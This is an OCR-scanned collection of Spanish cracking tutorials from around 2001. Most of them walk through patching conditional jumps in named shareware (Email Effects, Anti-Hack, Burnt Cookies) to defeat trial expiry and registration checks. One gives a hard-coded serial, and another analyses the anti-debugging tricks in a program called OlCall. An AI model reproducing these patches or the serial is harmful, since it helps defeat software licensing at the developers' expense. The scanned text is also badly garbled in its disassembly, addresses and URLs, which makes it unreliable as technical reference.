soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoQhotmail. com 


saludos 


e profesor x 

e dek_oin ( problema arreglado :) ) 
e txeli 

e kKuato_thor 

e Crkviz 

e code_mex 


e karpoff http://welcome.to/karpoff 


e xasx de tnt! http://www.tntcrackers. ws 


e Viper ( creador de file inspector ) file inspector web site http: / / www. finspec.swsites. net/ index. htm 


e toda la people de tutoriales2000. 


e saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean muchos 
tutoriales, practiquen, estudien y crackear será mucho más fácil. 


21/12/00 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre ingenieria inversa y 
programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Email Effects 


Caduca a los 28 días. 
Evitar que caduque, y realizar algunos cambios "estéticos". 


El programa es una aplicación la cual sirve para Crear y enviar 
por e-mail ASCII art. 


Newbie. 


http://www.sigsoftware.com/ 


W32dasm y Uedit32 (aunque valdrá cualquier otro editor hexa). 
Txeli FECHA: 17/12/2000 


INTRODUCCION 


el programa nos permitirá realizar ascii-arts, y mandarlos por e-mail, así como realizar magníficos .nfos para 


nuestros cracks :) 


al arrancar, el programa nos muestra la consabida "pantallita" (nag-screen para los guiris, pero aquí hablamos 
Castellano :-p ), que nos recuerda que es una versión de evaluación y que no tenemos licencia, esa misma pantalla 


se nos mostrará en help-->about. 


Abows. Emil Elocte 


$) Sig Software presents. Vordon 16 0 Juno 1909 


LaAcrwad para echara 
ES 


Fusbred: y bs | 


ASA | 


o] ps 


"Emáil Pllects 


0 JE 


no tenemos posibilidad de introducir ningún n£ de serie por ningún lado. ni ahora, ni cuando espira el programa. 


al atake 


pasemos a la acción. en la pantalla del principio vemos que pone "unlicensed", así que si estamos registrados nos pondrá 
algo así como "licensed to:" pues vamos a atacar por ahí. 


desensamblamos nuestra victima con el w32dasm, y mientras lo hace aprovechamos para hacer una copia del ejecutable, por 
lo que pueda pasar. una vez hecho echamos un vistazo a las strnref y encontramos la cadena que nos interesa. 


string resource id=32003: 
string resource id=32004: 
string resource id=32006: 
string resource id=32007: 
string resource id=32010: 
string resource id=32011: 
string resource id=32012: 
string resource id=32013: 
string resource id=32014: 
string resource id=32100: 
string resource id=32101: 
string resource id=32102: 
string resource id=32103: 
string resource id=32104: 


* [ -c controlfile " 
"[ -f fontfile ] " 


"your enabler code's activation period has expired. you shoul" 
"the license information on the clipboard has been corrupted " 
“http: //www.sigsoftware.cony" 

“unlicensed - " <---- la cadena buscada 

"licensed to :" 

“http: //www.sigsoftware.cony" 

"http://order.kagi.cony?bx" 

"your default web browser could not be launched. please open " 
"your permanent registration code has been detected and insta" 
“email effects" 

"version 1.6 O june 1999" 

“email effects help" 

"register email effects" 

"please purchase a license." 


hacemos doble click sobre ella y aparecemos aquí: 


* referenced by a 
| :004125c7 (c) 


:004126c8 6800010000 
:004126cd 8d442404 
:004126d1 50 


* possible reference to string 


:004126d2 6807740000 
:004126d7 al188214200 
:004126dc 50 


(u)nconditional or 


(c)onditional jump at address: 


push 00000100 


lea eax, dword ptr [esp+04] 
push eax 
resource id=32007: "unlicensed -— " 


push 00007d07 ¡aparecemos aquí 
mov eax, dword ptr [00422188] 
push eax 


subimos un poco buscando un salto condicional y lo encontramos aquí: 


:0041267a 55 push ebp 

:0041267b 683c010000 push 0000013c 

:00412680 e89b040000 cal1 00412b20 

:00412685 830420 add esp, 00000020 
:00412688 89c6 mov esi, eax 

:0041268a 85f6 test esi, esi 

:0041268c 0f84a6000000 je 00412738 ¡el salto 
:00412692 6a00 push 00000000 


* possible stringdata ref from data obj ->"ms sans serlf" 


apuntamos el offset ( OOO11a8c ), y nos vamos al uedit32, abrimos el archivo, y cambiamos Of84 (je) por Of85 (¡ne) 


bueno, ya tenemos nuestro programa sin limite de tiempo, pero aun tenemos esa horrible ventana diciéndonos que no 


estamos registrados, habrá que convivir con ella, después de todo, solo son un par de segundos al abrir el programa. pero, al 
menos vamos ha hacerla un poco menos fea. 


una sesion de maquillaje 


ahora vamos a ver como podemos retocar la dichosa ventanita, para que sea un poco mas estética. esta será sin duda la 
parte mas aburrida, ya que hay que ir buscando a mano poco a poco, pero el resultado final es de lo mas gratificante. 


lo primero de todo, será deshacernos de esos horribles botones (empiezo a parecerme a ruper, el peluquero, ¡que 
passsssaaaaa!!!! :-o ) 


el truco que voy a comentar a continuación, lo he encontrado de casualidad al modificar el ejecutable con el uedit32, así que 
no se si servirá con otros programas. 


abrimos el ejecutable con el editor hexa, y vamos buscando en el texto de la derecha hasta que encontremos lo que pone en 
los botones. en este caso lo encontramos aquí, "purchasing help" "purchase online" "purchase alternative". aquí podríamos 
cambiar el texto por otro que nos gustase mas, siempre con el mismo numero de letras. pero unas líneas mas abajo vemos 
que pone "button". 


J0020£20h: 45 4E 54 00 4D 53 20 53 61 6E 73 20 53 65 72 69 ; ENT.M3 Sans Seri 

J0020£30h: 66 00 00 00 44 49 28 22 00 00 00 00 3E 54 4F 50 ; £...JI("....>TOP 

J0020£40h: 49 43 22 2C 22 00 00 00 22 29 00 00 53 54 41 54 ; IC","...")..STAT 
; 42 55 54 54 4F 4E BUTTON 


J00201 60h: 49 43 00 00 00 00 00 00 52 65 67 69 73 74 72 61 2 IC..c... Reaistra 


¿y si lo cambiamos por puntos? pues si, desaparecen los botones :-) 


ahora, la pantalla no nos muestra ningún botón, solo que para poder salir de ella tendremos que pulsar la tecla "esc" así que 
vamos ha apuntarlo en la misma ventana para que no se nos olvide, pero ¿donde? pues donde pone el dichoso cartelito de 
"unlicensed - please purchase a license..." así que otra vez a buscar, esta vez vamos a cambiar "unlicensed - please purchase 
a license...” por "crackeado! presiona esc para salir" ;-) 


buscamos unlicensed y lo encontramos aquí 


00 65 00 ; s.o0.f.t.v.a.r.e. 


000817b0h: 73 00 6F 00 66 00 74 00 77? 00 61 00 72 
3 00 6F 00 6D 00 2F 00 OD 00 


000817c0h: 2E 00 


000817e0h: 20 00 2D 00 20 00 OE 00 45 00 6£ 00 61 00 62 00 ; .-. ...E.n.a.b. 


lo cambiamos por "crackeado!" recuerda, siempre el mismo numero de letras. ahora vamos a por "please purchase a license 
"y lo cambiamos por presiona esc para salir. y ya está, nuestra pantalla tendrá ahora este aspecto 


(8) Sig Software presents. portal boreblo 


rapera rar noc 


también podríamos utilizar el espacio de la versión y la url para poner nuestra dirección o cualquier otra cosa, (yo por 
ejemplo, lo he utilizado para poner mi nombre y un link a mi pagina) pero eso lo dejo para que practiquéis un poquito. 


finalizando 


se que podríamos haber eliminado la pantalla inicial del todo, pero como el la versión también aparece (solo que mostrando 
nuestro nombre), la dejaremos así, al menos es mas creativa. 


te recuerdo, que si te gusta el programa, debes comprarlo ya que el shareware es nuestra mejor fuente de experimentación. 


toda la información aquí mostrada es exclusivamente materia de aprendizaje, no me hago responsable de lo que puedas 
hacer con ella, ni lo que pueda pasar a tu equipo si lo haces mal. 


para conseguir mas material para aprender, visita mi pagina y la de mi grupo, ahí encontraras todo lo necesario para 
aprender. 


quiero agradecer con este tutorial la ayuda que me están dando en este mundillo mis amigos, el profesor x, sin la ayuda del 
cual este tutorial no habría sido posible, [dek_oin] gracias por tus consejos maestro, a “[twist]” por pasarme el programa, y 
todos los miembros de k-for entre otros, (disculpad que no ponga todos los nombres aquí, pero entonces la lista seria tan 
larga como el tutorial) y por supuesto a ti que me estás leyendo 


txeli: 
http: //club.telepolis. con/txelienlinea/index. htm 
txeli_enlineaCAhotmail.com 


grupo k-for: 
http: //pagina.de/kfor 


karpoff spanish tutor: pagina dedicada a la divulgación de información en castellano, sobre 


ingeniería inversa y programación. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


introduccion 


hola a todos !. este es mi primer manual que escribo. apenas llevo 2 semanas en esto del cracking y quiero que 
como yo pude aprender otras personas tambien puedan! ; ) 


este programa se podria ganar el premio a la protección más idiota que he visto. 


es un firewall que protege los puertos que tu quieras y asi controlar todo lo que pasa en tu pc. solamente 
espero que el programa se a mejor que su protección [ que la verdad fue muy fácil] 


Añinformación” * 


instalamos el programa y después de acabar de acabar de instalar el programa nos encontramos una bonita nag-screen que 
nos recuerda que tenemos que comprar el programa [$$$] y no nos deja iniciar el programa hasta despues de 10 segundos 
con solo dos botones "how to register" y "enter serial number". o sea que podemos ingresar un codigo de serie. leemos lo 
que dicen las letras de la nag-screen y despues de cargar 45 veces el programa ya no lo podemos usar. ; ( 


insertamos nuestros datos en mi caso: 
your name: yantiparzi ! 


serial number: 12345 


y nos sale un mensaje de error. 


ahora abrimos cualquier utilidad para ver si se encuentra empaketado, yo utilizé file inspector by viper y no aparece con que 
esta hecho el programa pero no esta empaketado, así que podemos continuar con el w32dasm 


hay dos formas la primera crackear el programa y hacer que acepte cualquier número de serie y el segundo buscar el número 
de serie. en este manual haremos las dos formas 


ANcrackear el programa”” 


lo abrimos con el dasm y todo se carga. 


ahora vamos a las string reference "strn ref” y buscamos algo interesante y que es lo que vemos "invalid serial number. 
try again", damos doble click en ella y nos lleva a la parte del codigo donde esta eso. inspeccionamos un poco más a 
ver que otras cosas interesante encontramos subimos un poco y encotramos algo que dice "error' si no recuerdo mal ese 
era el título del mensaje cuando fallamos en el serial, bien , bajamos y que encontramos no puede ser !!! "registered" y 
un poco más abajo "thank you for registering anti-hack!" 


esto solo quiere decir algo que cuando introducimos nuestro número hace una serie de comprobaciones y si el numero 
es correcto nos manda al mensaje de "registered" 


buscamos un poco mas arriba hasta llegar aquí: 
*reference to: msvbcmó60._vbavartstea, Ord:0000h 


:0042v243 ff15d0104000 call dword ptr [00401040]  <---- [ rutina de comprobación] 


:0042b249 6685c0 test ax, ax < ---- [ comprueba que el serial es correcto] 
:0042b24c 0f848d000000 je 0042b2df < ---- [ si es correcto nos manda a la ventana que estamos registrados] 
:0042b252 eb06 jmp 0042b25a < ---- [ si no es correcto nos manda al error] 


ya sabemos lo que tenemos que hacer si cambiamos el salto condicional del '42b24c' de un 84 a un 85 el programa 
aunque el serial sea incorrecto nos llevara a la pantalla de que estamos registrados. 


copiamos el offset que es '2b24c' y vamos al editor hexa hacemos los cambios y tratamos de registrar metemos 
nuestros datos y nos acepta nos da el mensaje de gracias!!, que bien ya terminamos, perooo al poner ok sale otra vez el 


comprobación y si no es correcto nos manda una vez mas al mensaje de error. ahora hay que buscarlo. 
pero que es lo que vemos un poco antes del mensaje de error lo siguiente: 
*referenced by a (u) nconditional or (c) onditional jump at address: 


| : 0042b17d (c)  <---- [ de esta direccion nos manda al mensaje de error] 


lo que tenemos que hacer ahora es ir a la dirección, en el 'goto code location”, llegamos a la dirección y que es lo que 
vemos: 


*reference to: msvbvm60._vbavartsteq, Ord:0000h 
:0042b174 ff15d0104000 call dword ptr [00401040]  <---- [rutina de comprobación] 


:0042b17a 6685c0 test ax, ax < ---- [comprueba que el serial sea correcto] 


:0042b17d 0f85d1000000 ¡ne 0042b254 < ---- [si no es correcto nos manda al error] 


creo que ya sabemos lo que tenemos que hacer tenemos que cambiar para que aunque el serial sea incorrecto nos 
mande a que estamos registrados [cambiando el 85 por un 84 en el 42b17d] 


copiamos el offset '2b17d' y hacemos los cambios bien podemos cambiar el 85 por 84 o poner nop's [909090909090]. 
ya hechos los cambios lo probamos y perfecto !!!! todo listo ya estamos registrados con el serial que queramos... 


ANel serial?" 
al principio del manual dije que era una protección muy idiota, la mas idiota que había visto. ahora veran por que : 


un poco más arriba del mensaje de error que es lo que encontramos: 


* Possible StringData Ref from Code 0bj <>"s8l1d-9adf-" 
| 
:0042B1F2 68F4F54000 push D040F5F4 


si que sera ese número tan extraño 's8ld-9adf-' que tal si lo introducimos en el serial y !!!! entra... no lo puedo creer con 
cualquier nombre que pongas con este código lo registra, y vuelvo a decir que clase de protección es esta? nos dan el 
número para registrarnos..... me pregunto ahora el programa sera igual que su protección???? 


conclusiones 


algo mas que puede ser de utilidad hecha un vistaso en la dirección donde guarda el registro: hkculsoftwarelvb and vba 
program settingslanti-hack register 


bueno este es el fin y como ya sabes este fue mi primer manual asi que espero no haberme equivocado y que me entiendan, 
si tienen alguna duda sobre algo no dudes en mandarme un mail. 


lo que quiero decir es que cuando yo empece no sabía nada, y gracias a estos manuales he aprendido mucho. 


y que mejor manera de aprender que con una protección tan fácil como esta, en verdad es un desperdicio en poner este tipo 
de protección en programas que estan a la venta. 


bueno me despido dando las gracias a todos ustedes que leen estos manuales y en especial a : 
karpoff 
kuato_thor 
profesor x 
gracias a todos por su apoyo. 


mi correo: yantiparzi+hotmail. com 


mi página : http://orbita.starmedia.comiinternet_security 


yantiparzi [2001] 


all its possible----your mind is the weapon ! 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: OLCall1 1.x 

PROTECCION: Empaquetado, antidebug, antifrogsice =D. 

Objetivo: Estudio de los trucos antidebug usados en OlLCall. 

Descripcion: No disponible. 

Dificultad: Media 

DOWNLOAD : http://o1lcal1l.cjb.net/ 

Herramientas: W32dasm. 

CRACKER: BiRKiN FECHA: 12/1/2001 
introduccion 


holas, antes de nada un saludo a todos mis amigos de +tcrackers y tutoriales 2000, al grano. en este documento pienso 
explicar (dentro de mis modestos conocimientos) los trucos antidebug usados en el programa olcall. en ningun momento 
voy a decir como evitar esta proteccion (aunque despues de decir como funciona....) ni mucho menos como crackearlo o 
registrarlo. por el precio del programa (1.500 pelas) y por la molestia que se ha tomado el autor en protegerlo, creo que 
merece la pena comprarlo. 


al comentar el codigo doy por sentado que tienes unos conocimientos básicos del lenguaje 
ensamblador . si no conoces el seh (structured exception handling) tienes un tutorial buenisimo aqui: 
http:/ / www.plic.net/ —-win32asm/ exceptionhandling.html 


te hará falta porque se utiliza mucho en el programa, y, coño, porque el saber no ocupa lugar. 


al atake 


codigo del antidebug 


¿los offsets corresponden a olcall.exe, en setup.exe, las 


instrucciones 


¿son identicas, solo que 45000h bytes atras 


¿; no seas cazurro y sigue el codigo como si se estuviera 


ejecutando, que un 


;Jjmp es un jmp y si no no te enteras de ná 


:004af3e2 55 push ebp 


:004af3e3 8d85a2030000 lea eax, dword ptr [ebp+000003a2] 


:004af3e9 50 push eax 

:004af3ea 33c0 xor eax, eax 

:004af3ec 64ff30 push dword ptr fs: leax] 
:004af3ef 648920 mov dword ptr fs: l[eax]l, esp 


:004af3f2 ebl10 jmp 004af404 


¡utilizando el seh, añade un "exception handler" 
¿cuyo address es [ebp+3a2] = 004af3f4 


¿por lo tanto si el programa causa una excepcion, 


¡la ejecución saltara a 004af3f4 


¿osea aqui abajo: 


:004af3f4 8b642408 mov esp, dword ptr [esp+08] 
:004af3f8 8b6c2408 mov ebp, dword ptr [esp+08] 
:004af3fc 8d85b8030000 lea eax, dword ptr [ebp+000003b8] 
:004af402 50 push eax 

:004af403 c3 ret 


¡aqui restaura la pila, eliminando la entrada anterior de seh, 
¡y salta a ebp+3b8 = 004af40a 


* referenced by a (u)nconditional or (c)onditional Jump at address: 
| :004af3f2 (u) 


:004af404 cc 


:004a£f405 e911010000 


3mp 00%4af51b 


¡llama a la interrupcion del debugger. si algun programa la esta 


usando, 


; (debugers, dumpers...) lo interpretara como un "breakpoint" y 


luego 


¿continuara el flujo normal del programa (jmp 004af51b) donde esta 


¡la funcion que nos muestra el bonito mensaje de "debugger 


detected". 


¿si no hay ningun programa usandola, se generara una excepcion, 


¡ya que en la idt, la int 3 apuntará a 0000:00000000, y un proceso 


¿normal no tiene acceso a este lugar. 


r 


¿con softice o trw2000 esto no debe preocuparnos, ya que ambos 


emulan 


¡esta excepcion. el problema aqui es que la ejecución saltaría al 


¿exception handler antes instalado, con lo que perderiamos el 


control 


¿del programa. 


¿si en cualquiera de los 2 tenemos i3here = on, olcall nos 


detectará 


¡el debugger y nos mandará a paseo 


:004af40a 8d85ca030000 
:004af410 89442404 
:004af414 646789260000 
:004af4la eb10 


lea eax, dword ptr [ebp+000003ca] 
mov dword ptr [esp+04], eax 

mov fs: [0000], esp 

jmp 004af42c 


¡instala otro exception handler, esta vez en 004af41c. aqui 


debajo... 


:004af41c 8b642408 mov 
:004af420 8b6c2408 mov 
:004af424 8d8511040000 
:004af42a 50 
:004af42b c3 


esp, dword ptr [esp+08] 

ebp, dword ptr [esp+08] 

lea eax, dword ptr [ebp+00000411] 
push eax 

ret 


¡vuelve a restaurar la pila, y nos hace saltar a 004af51b.... 


¡vaya por dios, otra vez el mensaje... 


* referenced by a (u)nconditional or (c)onditional Jump at address: 


| :004af41a (u) 


:004af42c Of0O18de80f£0000 sidt [ebp+00000fe8] 
:004af433 8b85ea0f£0000 mov eax, dword ptr [ebp+00000fea] 
:004af439 83c04e add eax, 000000le 


¡Obtiene la direccion de la idt, y la carga en eax 


¡le suma a eax (5*8)+4 (4e) para obtener el offset de la entrada 


¡correspondiente a la interrupcion 5 (para que la querrá?) 


:004af43c 668b18 mov bx, word ptr [eax] 
:004af43f cle310 shl ebx, 10 

:004af442 668b5802 mov bx, word ptr [eax+02] 
:004af446 b8000c0000 mov eax, 00000c00 

:004af44b 813b45524548 cmp dword ptr [ebx], 48455245 
:004af451 0£84c4000000 je 00%af5lb 

:004af457 813b524f4753 cmp dword ptr [ebx], 53474£52 
:004af45d 74f2 je 00%af451 

:004af45f 43 inc ebx 

:004af460 48 dec eax 

:004af461 7fe8 Jg 00%af44b 


¡este bucle escanea los c00h primeros bytes del handler del la int. 


5 


¿en busca de las cadenas de bytes 45,52,45,48 y 52,4£,47,53. si 


las 


¡encuentra, 


excepcion 


¿controlada. 


patitas 


ja la calle) 


r 


¿joder gonzalo, 


pues 


¿ni más ni menos q las cadenas "ereh" y "rogs". 


muy 


¡bien como funcionaba el frogsice, 


¡estaba activo, 


0 


buen truco! 


salta a codigo basura (004af451) y causando asi una 


(y el handler de la interrupcion, como no, nos tira de 


a que no sabeis que son esos bytes? 


gonzalin se miró 


y se dio cuenta de que, mientras 


redireccionaba casi todas las interrupciones entre 


¡y f. y busco cerca del offset de la interrupcion cadenas con las 


que 


¡¿detectarlo. "inst" "soft" "bchk" "rogs" aparecen por ahi, entre 


otras :) 


:004af463 8d8523040000 


:004af469 89442404 


:004af46d 646789260000 


:004af473 eb10 


¿si sale del bucle sin detectar frogsice, 
en 004af475, y salta a 004af485 


¿se handler, 


lea eax, 
mov dword ptr 
mov fs: [0000], 
jmp 004af485 


dword ptr 


esp 


:004af475 8b642408 mov esp, dword ptr 
:004af479 8b6c2408 mov ebp, dword ptr 
:004af47d 8d8547040000 lea eax, dword ptr 
:004af483 50 push eax 

:004af484 c3 ret 


* referenced by a 
| :004a£473 (u) 


:004af485 9c 


:004af486 810c2400010000 or dword ptr [espl, 


:004af48d 7502 
:004af48f cd20 


¿joder joder, 


verifica la tf (trap flag), 


(u)nconditional or 


pushfd 


jne 00%4af491 
int 20 


[esp+04], 


si está on, 


[ebp+00000423] 
eax 


vuelve a instalar otro 


[esp+08] 
[esp+08] 
[ebp+00000447] 


(c)onditional Jump at address: 


00000100 


es que el 


¡programa esta siendo traceado... 


¿no se porque este metodo no me detecta siempre el softice, 


que 


¡era por algo del agi stall, pero me equivoque :) , 


que 
¡ver con eso. 


* referenced by a 


(u)nconditional or 


creia 


no tiene nada 


llamemosle 'peculiaridades de mi pc' 


(c)onditional Jump at address: 


| :004af48d(c) 

| 

:004af491 9d popfd 

:004af492 £8 cle 

:004af493 0f8382000000 jnb 004af5lb 

:004af499 8d8559040000 lea eax, dword ptr [ebp+00000459] 
:004af49f 89442404 mov dword ptr [esp+04], eax 
:004af%a3 646789260000 mov fs: [0000], esp 

:004af%a9 ebl10 jmp 004af4bb 


¿otra vez un exception handler, 


llamar 


se handler o como le quieras 


¡y otra vez en el pedazo de codigo justo despues del jump 


:004af%ab 8b642408 


mov esp, 


dword ptr [esp+08] 


:00%4af%af 8b6c2408 mov ebp, dword ptr [esp+08] 
:004af4b3 8d8580040000 lea eax, dword ptr [ebp+00000480] 
:004af4b9 50 push eax 

:004af%4ba c3 ret 


* referenced by a (u)nconditional or (c)onditional Jump at address: 
| :004af4a9 (u) 


:004af4bb 66b80043 mov ax, 4300 

:004af4bf cd68 int 68 

:004af4c1 80bd290e000000 cmp byte ptr [ebp+00000e29], 00 
:004af4c8g 7408 je 00%4af4d2 

:00l4af4ca 66057b0c add ax, 0Oc7b 

:004af4ce 6648 dec ax 

:004af4d0 7449 je 00%4af51lb 


¿uno de mis trucos antidebug favorito 


¡"frogsice could not detect it while softice is loaded" 


¡aunque tambien "frogsice get fucked" hace un rato :)) 


¿segun ralph brown: 


jint 68 u —- ?2?? — installation check?? 


p ax = 4300h 

; return: 

; ax = f386h if ?2?? 
22? 


¡pues ya sabemos que detecta! el debugger! 
¿sumarle 0Oc7bh a ax y luego restarle 1, es lo mismo que 


¡¿cmp ax,f386h. el je 004af51lb nos lleva a... ya sabes 


* referenced by a (u)nconditional or (c)onditional Jump at address: 
| :004af4c8 (c) 

| 

:004af4d2 8d8592040000 lea eax, dword ptr [ebp+00000492] 
:004af4d8 89442404 mov dword ptr [esp+04], eax 

:004af4dc 646789260000 mov fs: [0000], esp 

:004af%e2 eb10 jmp 004af4f4 


¡miralo! 


que original 


:004af%e4 8b642408 mov esp, dword ptr [esp+08] 
:004af%e8 8b6c2408 mov ebp, dword ptr [esp+08] 
:004af%ec 8d85bd040000 lea eax, dword ptr [ebp+000004bd] 
:004af4f2 50 push eax 

:004af4f3 c3 ret 


¡este exception handler solo entrará en juego si boundschecker 


¿genera una excepcion (no hay sice, o algo de vida inteligente 
mirando 
¡al sice 


* referenced by a (u)nconditional or 


| :004af4e2 (u) 


:004af4f4 


(c)onditional Jump at address: 


f685290e0000ff test byte ptr [ebp+00000e29], ff 


:004af4fb 7412 je 004af50f 
:004af4fd 7501 jne 004af500 
:004af4ff ebbd jmp 00%af4be 
:004af501 4b dec ebx 
:004af502 48 dec eax 
:004af503 43 inc ebx 
:004af504 42 inc edx 
:004af505 6a04 push 00000004 
:004af507 58 pop eax 
:004af508 cc int 03 
:004af509 663d0400 cmp ax, 0004 
:004af50d 750c jne 00%4af5lb 


;¡Jejej, este gonzalin, que cab**n que es... 


¿tenemos un jz y luego un jnz, alguno de los dos tendra que saltar 
no? 

¿pues que hace un Jmp despues? no es un jmp. fijate que el jne 
salta 

¿en el segundo byte de este supuesto jmp, transformando el medio 
jmp 

¡y la ristra de decs y incs que vienen despues en un mov ebp, "bchk" 
¡si a eso le sumamos el, tb oscurecido mov eax,4 , tenemos mi 
¿truco antidebug favorito =d 'boundschecker' 

¿mov ebp, 'bchk' 

¡mov eax,4 

jint 3 

¡es un backdoor de softice, hace que no simule que la int 3 


¿esta sin usar. o sea, aqui saltariamos al exception handler si no 


¡hay sice, o continuaria la ejecucion por debajo del int 3 si 


¡tenemos sice. 
¿igual que el anterior, "frogsice could not detect this method 


while 


¿softice is loaded in memory" 


resumen 


e el programa se asegura de que no usamos ningun programa que utilice la int 3, debuggers cutres, sice o 
trw2000 con ¡3here on, dumpers y cosas asin. 

e Obtiene el offset del handler de la int 5 y lo escanea en busca de las cadenas "rogs" y "ereh", para 
detectar frogsice (muy buen truco) 

e Comprueba el estado del trap flag, para detectar si estamos traceando con softice 

e int 68h - debugging kernel o algo asi - detecta todos los debuggers en modo protegido 

e boundschecker, por si el sice aun sigue vivo 


conclusion 


aunque la protección no sea una maravilla (que yo haya podido con ella no dice mucho a su favor ;) ), hay 
que reconocer que esta mejor que otras que hay por ahi sueltas, pero se puede mejorar, mucho. si yo no 
hubiera visto esa instrucción sidt, no estaria escribiendo esto ahora. gonzalo, has demostrado que sabes 
ocultar instrucciones y muy bien, pues coño, deverias haberte dado cuenta de que ese sidt canta que te cagas. 


pues eso, complica mas el codigo, escribe instrucciones en tiempo real, no organices el codigo con una 
estructura tan facil de ver. oye, y si a la primera te ocultan el debugger, a la segunda pasa de messagebox, y 
cuelga el ordenata :)) (es una opcion) 


doc by birkin [02/01/01] 


www.birkin.org 
antidebugrizObirkin.org 
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karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Burnt Cookies v1.0.12 


Serial. 

Simular estar registrados. 

Programa para ver las cookies del ordenador 
Novato. 
http: //www.andersson-design.com/ 

W32dasm, Editor Hexadecimal 


Pedrolas FECHA: 15/01/2001 


introduccion 


burnt cookies es un programa que sirve para llevar el control de las cookies de tu ordenador. es capaz de 
monitorizar todos los cambios que se produces en las cookies cuando entras en las paginas web de las que ya 
haya una cookie registrada en tu ordenador. 


este es mi tercer tutorial, y espero que os sirva para aprender como lo estoy haciendo yo con los manuales que 
escriben otras personas. 


al atake 


comenzamos abriendo el programa y viendo que nos dice, para ello ejecutamos el programa "burnt cookies.exe" y nos 


sale una cosa como esta: 


ES Burt Cookies 21 xj 


UBL : Internet Explorer is not running Le As, 
Total conflagratioris : O Total in thiz session: 0 
Cookies in your Cooke folder Ingredients of: selected cookie _Emn | 


pedro lopez crespo. veo a 
pedro lopez crespol2luww webr 
pedro lopez crespol2dwww. web 
pedro lopez crespo. webs : 
pedro lopez crespoldwwwww. webs 
pedro lopez crespo. web: 
edro lopez crespolwww.web' 
pedro lopez crespolSiww2 ter. 
pedro lopez crespo, but 
pedro lopez crespol2imww9B2. lE 
pedro lopez crespolBiwwww.der 
pedro lopez crespo(23x10[1] txt 
pedro lopez crespolix=xcounter 
pedro lopez crespottdyahao[2].t 
pedro lopez crespoaymO[ 1], txt 
pedro lopez crespotMzdnet[2] tx 29380938 Hide 
pedro lopez crespolSMzonagoliatl y a 7 s 


l. 


r Program starts up 'm] Promptif Cookies are G.. orar Pi esoeptifbaked 
vath pour computer made with a new recipe te-baked ihthe current URL 


en esta imagen vemos un bonito boton que pone "register", lo apretamos y nos sale lo siguiente: 


Registration IES! 


Ifyou have not already obtamed your registration 
number then click the "Go Online" button to-obtain one, 


This wilbtake you to the web-site where you can start 
Ihe registration process. Have pour credit card hand»! 


The cost ofregistration is just $5. Go Online 


Ifyou alteady have pour registration: number pou should enter it together 
with your name and e-mail address EXACTLY as you spelled them: online. 


Name [Pedrolas 
E-Mail Address [pezG3ri.com 


Registration Number [IEXFGTEN 


coca_| 


lo rellenamos con nuestros datos y como el programa no es tonto, nos dirá que los datos son incorrectos, mostrandonos 
la siguiente ventana. 


BURNT COOKIES 


CS y Lamsorty bul the registration number does not 
2) correspond with your name and e-mail address. 


Would you like to try again? 


ha llegado el momento de ver como los atacamos, con el softice o con el w32dsam. bueno pues yo he elegido el 
w32dsam y parchear el programa para que crea que estamos registrados, cosa que no es verdad. para ello abrimos el 
"burnt cookies.exe" con el w32dsam y buscamos en el stringref algo parecido a la frase que nos sale cuando metemos 
un registro incorrecto "i am sorry but.....". 
eureka, la encontramos pero cuando pinchamos en ella no encontramos nada en el codigo para poder atacar al 


programa. 


4/32Dasm List of String Data Items Dx 
To Search Disassembly for Strina Data. Double Elick on Text Cancel Search 


String Resource ID=00100: "OLE initiahzation failed. Make sure that the OLE libranes” 
String Resource ID=00101: "S4bout Bumt Cookies..." 

Strino Resource ID=001 02: "Internet Explorer is not running" 

String Resource ID=00104: "Cookie: 21 (Would you like to add this Cookie to your “Burn L” 
String Resource ID=00105: "Are pou sure you want to delete]'"' 

Strina Resource 1D=00106: "Waiting for next change to URL" 

String Resource ID=00107: "The Cookies Folder Monitor thread was unable to initialize ¡" 
Strina Resource ID=00108: "Cookie "1"lis similar tolCookie "22" IfwWould you like the n” 
String Resource ID=00109: * This is a list of Cookies which will be automatically remo" 

q Resource ID=00110: " This is a list of Cookies which have been removed from you" 
Resource ID=00111: "Retoister” 

String Resource ID=00112: " | am sorry but the registration number does notlcorrespond" 
String Resource ID=00113: " As you were unwilling to establish an Internet connection ” 
Strina Resource /D=00114: " As it was not possible to establish an Intermet connection" 
String Resource ID=00115: " "Bumt Cookies" has now deleted 21 Junwelcome cookies from” 

String Resource ID=00116: " You are welcome to continue to use "Burnt Cookies"Jbut you" 

String Resource ID=00117: "The registration number you entered has expiredlor may have ” 3 


Close Copy Al Copy Vie] 


pero sin embargo encima de nuestra frase se encuentra una que dice "reézgister", muy sospechosa, la miramos y 
caemos en el siguiente codigo: 


00406127 ESZBDBOLDO call 00423057 

-DO406120 BASGDSUEOODO mov al, byte ptr [esít000006D8] 
500406132 24C0 test al, al 

:00406134 7420 3e 060406163 <-—— salto a nopear 


* Possible Reference to String Resource ID=00111: "Register" 
l 


00406138 BD402400 lea écx, deord ptr [esp+0C] 
00406130 RSDCS10100 call 0041F31D 

:00406141 F7D8 neg esx 

00406143 1BC0 <hbb eax, eax 

00406145 40 inc eax 


caemos en la siguiente linea: 
:00406136 6a6f push 0000006f 


en la linea anterior vemos un salto que si lo pulsamos nos lleva al lugar donde hemos caido antes, pues bien tomamos 


el offset de la linea del salto: 


que resulta ser el "00006134h", abrimos un editor hexadecimal y le damos a buscar el offset indicado, cuando llegamos 
sustituimos el 74 por un 75, salvamos y tenemos el programa registrado de tal manera que cuando volvamos a 
reiniciarlo nos saldrá lo siguiente: 


| Burnt Cookies 


en la cual vemos que ha desaparecido el boton "register". esto es todo amigos. 


bilbao a 16 de enero de 2001. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


